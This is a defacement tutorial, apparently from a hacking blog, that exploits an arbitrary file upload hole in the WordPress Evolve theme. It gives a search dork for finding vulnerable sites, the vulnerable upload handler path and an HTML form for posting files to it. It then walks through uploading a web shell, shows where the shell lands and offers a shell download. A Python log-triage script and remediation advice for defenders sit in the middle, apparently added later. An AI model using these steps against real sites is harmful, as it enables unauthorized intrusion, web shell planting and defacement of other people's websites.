Deface Exploit Wordpress Evolve Arbitrary File Upload Vulnerability

How to Deface: Exploit Wordpress Evolve Arbitrary File Upload Vulnerability


Hello everyone
It's me again. This time I will give a deface tutorial, as the title above says. Let's get straight to it.

Author : Indonesian Cyber Freedom

Dork : inurl:/wp-content/themes/evolve/js/ ( You can expand on this yourself )

Exploit : /wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php

Code CSRF :
<form enctype="multipart/form-data"
action="target.com/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

Search for a target using the dork

If it is vulnerable, it will look like the image below :


Open the CSRF code :



Open that CSRF form in your browser and upload a shell. If it succeeds, it will look like this :


Shell access : http://site.com/wp-content/uploads/years/month/shell.php
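
For defenders, the request sequence described above (a POST to the theme's upload handler, then a request for a script under wp-content/uploads) leaves a recognizable trail in the web server access log. The following is an added example, not part of the original post: a Python triage over combined-format log lines. The log format, the function name triage and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Upload handler path exactly as given on the page.
HANDLER = ("/wp-content/themes/evolve/js/back-end/libraries/"
           "fileuploader/upload_handler.php")
# Combined log format: client, timestamp, method, request target, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3})')
# Script-type files requested from the uploads tree, which should hold media only.
SCRIPT_IN_UPLOADS = re.compile(r"/wp-content/uploads/.*\.(php\d?|phtml|phar)$", re.I)

def triage(lines):
    """Return (kind, client, timestamp, path, status) findings in log order."""
    findings, posters = [], set()
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        client, ts, method, target, status = m.groups()
        path = unquote(urlsplit(target).path)  # drop the query, decode %xx
        if method == "POST" and path.endswith(HANDLER):
            posters.add(client)
            findings.append(("handler_post", client, ts, path, int(status)))
        elif SCRIPT_IN_UPLOADS.search(path):
            # Same client posted to the handler earlier: likely follow-up access.
            kind = "script_after_upload" if client in posters else "script_in_uploads"
            findings.append((kind, client, ts, path, int(status)))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [12/Mar/2015:10:01:02 +0000] "GET /wp-content/themes/evolve/js/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2015:10:02:10 +0000] "POST ' + HANDLER + ' HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2015:10:02:40 +0000] "GET /wp-content/uploads/2015/03/x.php?a=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2015:10:05:00 +0000] "GET /wp-content/uploads/2015/03/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2015:10:06:00 +0000] "GET /wp-content/uploads/2014/11/old%2Ephp HTTP/1.1" 404 0 "-" "curl/7.0"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A script_after_upload finding with status 200 warrants inspecting the named file on disk. Removing the handler file and denying script execution in the uploads directory closes the path the tutorial relies on.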

If you don't have a shell yet, you can download one here
Download Priv8 Shania Shell

That's all, and thank you =)
